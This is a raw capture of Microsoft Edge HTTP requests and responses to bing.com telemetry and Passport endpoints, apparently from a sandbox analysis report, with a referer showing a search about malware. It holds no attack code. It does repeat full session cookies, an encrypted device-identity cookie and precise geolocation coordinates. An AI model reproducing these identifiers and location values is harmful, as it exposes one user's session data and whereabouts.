cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.1491150e
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

cache-control: private
content-length: 25
content-type: text/html
content-encoding: gzip
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bb34b9a4b6783f0cbccc4f9c7e0
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Wc8eAhVozqIJrkyqqqeuG3kfGLwq2ZIuQ2nwa1Lit5Q='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 32C28686A14E48AD88349FF31C073130 Ref B: LON601060102025 Ref C: 2024-10-17T21:03:47Z
date: Thu, 17 Oct 2024 21:03:47 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:47 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:47 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.1491150d
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.PPT&DATA={%22S%22:992,%22E%22:2476,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.PPT&DATA={%22S%22:992,%22E%22:2476,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.14911781
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199026520%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221152.0000000018626%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199026524%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222711.0000000102445%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199026524%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026661%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199026520%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221152.0000000018626%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199026524%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222711.0000000102445%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199026524%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026661%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347

Response

HTTP/2.0 200

cache-control: no-cache,no-store
pragma: no-cache
content-length: 286
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bb322f4473a80a39c5ba4b847d6
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-rrDMl9stJHq8+o/CRFsILewgNnXR2uCJL1UlI8yku4I='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: A8F502E7C08F4DD38DA473DC44D007CB Ref B: LON601060106054 Ref C: 2024-10-17T21:03:47Z
date: Thu, 17 Oct 2024 21:03:47 GMT
set-cookie: .MSA.Auth=; expires=Thu, 01 Jan 1970 00:00:00 GMT; max-age=0; domain=.bing.com; path=/; secure; samesite=lax; httponly
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:47 GMT; path=/; HttpOnly
set-cookie: DIDC=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: DIDC=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: DIDCL=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: DIDCL=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.149118a5
GET

https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /secure/Passport.aspx?popup=1&ssl=1 HTTP/2.0
host: www.bing.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: DIDC=ct%3D1729199027%26hashalg%3DSHA256%26bver%3D40%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C515_BAY.0.D.CioOGWw7eAHnurTq%252B9miWMolVTVfStz1zZt/w1gl1lLhUe8LQF8Pa7bk6hwfzPTcCk%252BWKulmIxIYahu9CjHcdE1jsmFFfhdMRCJg67NUZimTTJhX9sa7Wort0z6SPuSATbi1SgxJrERf/XXC3BnqzTnStU6lf%252B78SOOC3mDKP23qUjKvYSajGA9x5rT0yK6bB4O4esxOdr0m9crFpxbfXu7xjbLSsIwRlj6WIjX1mtLyCdsJOmgw%252BDUmMgr0tivMF7M0QRl4u0gfogAUK2SwIXbS9iZR/QkMXGXDQMlz5e5L59pPPYKDEPkyFR2ks8Gdqq7DsjtCXK9JzQTu6blrrzUUOjqQL%252Bnf84%252Brzob11nOlRhgdaANOQ5NC3ieTRXSXYdq1eH/2YMQiqq2cyEcwp4kIhERM3Vd%252BdfBlOOt4ccOzs5bdwdCiGQaPxl1baPIHCXaMeRgUpSoxnDcYKY8h7OUpOXykFe%252BvQE6cJPp01NLfnlDdcnpWs//YMbluahK5aXV5dkhAHLG5icEGuNqTAtfs5s31FMENJf2kXVIGMVSg%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3Di2QmRlPwAB%252BvibAUoU%252FJKe7Dc5KnSLEr%26hash%3DIXz81iX1fynkiWklyn4YwDmGkF5O1uhnvzqatf01grw%253D%26dd%3D1
cookie: DIDCL=ct%3D1729199027%26hashalg%3DSHA256%26bver%3D40%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C515_BAY.0.D.CioOGWw7eAHnurTq%252B9miWMolVTVfStz1zZt/w1gl1lLhUe8LQF8Pa7bk6hwfzPTcCk%252BWKulmIxIYahu9CjHcdE1jsmFFfhdMRCJg67NUZimTTJhX9sa7Wort0z6SPuSATbi1SgxJrERf/XXC3BnqzTnStU6lf%252B78SOOC3mDKP23qUjKvYSajGA9x5rT0yK6bB4O4esxOdr0m9crFpxbfXu7xjbLSsIwRlj6WIjX1mtLyCdsJOmgw%252BDUmMgr0tivMF7M0QRl4u0gfogAUK2SwIXbS9iZR/QkMXGXDQMlz5e5L59pPPYKDEPkyFR2ks8Gdqq7DsjtCXK9JzQTu6blrrzUUOjqQL%252Bnf84%252Brzob11nOlRhgdaANOQ5NC3ieTRXSXYdq1eH/2YMQiqq2cyEcwp4kIhERM3Vd%252BdfBlOOt4ccOzs5bdwdCiGQaPxl1baPIHCXaMeRgUpSoxnDcYKY8h7OUpOXykFe%252BvQE6cJPp01NLfnlDdcnpWs//YMbluahK5aXV5dkhAHLG5icEGuNqTAtfs5s31FMENJf2kXVIGMVSg%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3Di2QmRlPwAB%252BvibAUoU%252FJKe7Dc5KnSLEr%26hash%3DIXz81iX1fynkiWklyn4YwDmGkF5O1uhnvzqatf01grw%253D%26dd%3D1
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347

Response

HTTP/2.0 200

content-length: 75
content-type: text/html; charset=utf-8
access-control-allow-origin: https://www.bing.com
cache-control: no-cache, no-store, must-revalidate
content-encoding: gzip
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67117bb44ab84511ad43de46e0623acb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-sAem1PM0awZJFOMgefdNrz+A0PDMjsxZ7bb0aq2vfMI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:48 GMT
alt-svc: h3=":443"; ma=93600
